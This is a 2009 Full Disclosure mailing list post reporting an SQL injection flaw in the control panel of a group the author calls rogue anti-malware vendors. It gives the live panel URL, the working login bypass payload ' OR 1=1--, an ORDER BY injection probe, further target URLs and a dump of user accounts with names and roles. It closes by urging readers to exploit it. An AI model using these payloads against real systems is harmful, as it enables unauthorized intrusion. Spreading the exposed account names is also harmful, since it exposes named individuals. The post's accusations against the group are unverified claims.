Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

SQL Injection in Rogue Anti-Malware Group's Control Panel

From: Xia Shing Zee <xiashing () gmail com>
Date: Wed, 8 Apr 2009 20:26:28 +1000
Dear Full-Disclosure,

Since F-Secure, Kaspersky, Symantec, SecurityFocus and Secunia apparently
don't care about fake anti-virus authors, I'm giving you this awesome, yet
simple flaw that will give you access to their main control panel.

========
!background
========
I originally found this while doing some very basic reversing of the hoax
antivirus called MalwareRemovalBot.

========
!stuff
========
The affiliate group that controls many rogue anti-malware software has a SQL
injection vulnerability in their control panel that hosts all their sites.
This control panel, is also hosted on a domain that is controlled by the
rogue group. On the control panel, resides a user list, malware search,
definition search, settings, statistics, archives, various databases, and
TODO lists. The group is frequently featured on the F-Secure Weblog at
http://www.f-secure.com/weblog
Details follow below:

The main control panel for the group:
http://spywaredb3.2squared.com

With the 'trivial' SQL injection flaw:
Username: ' OR 1=1--
Password: ' OR 1=1--

User List:
http://spywaredb3.2squared.com/members/list

admin  admin   chris  admin   nav  admin   bob  admin   mike  admin
support researcher  suresh researcher  Bhawesh researcher  support21
researcher  meredith describer  rob describer  jamie describer  Kumar
limited  limited limited  limited2 limited  Mathew limited  lenart
researcher  Venkatesh researcher  Parvez researcher  andrea describer
moses research_marketer  aveen researcher  tmarket marketer  sarab
marketer  lizc marketer  trm research_marketer  Plato researcher  siva
researcher  arvind researcher  padmanabhan researcher  Vivekanandan
researcher  Rajesh researcher  Arun researcher
Other sites you might be interested in:
http://privacycontrol.com/members/index.php
http://errorsmart.com/
http://www.malwareremovalbot.com/members/index.php
http://rpc.2squared.com/driver_data/post.php?postHardware=-2&Settings=
http://spywaredb3.2squared.com/update/info

There are also other PHP flaws that were on the 2squared.com domain,
however, I could not exploit them. Such as this:
http://rpc.2squared.com/manualdb.php?productName=-9+ORDER+BY+20--

========
!end
========
Have fun eXpl0iting,
Xia Shing Zee
Sad nobody gives a shit when somebody could actually take this shit down,
legitimately.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: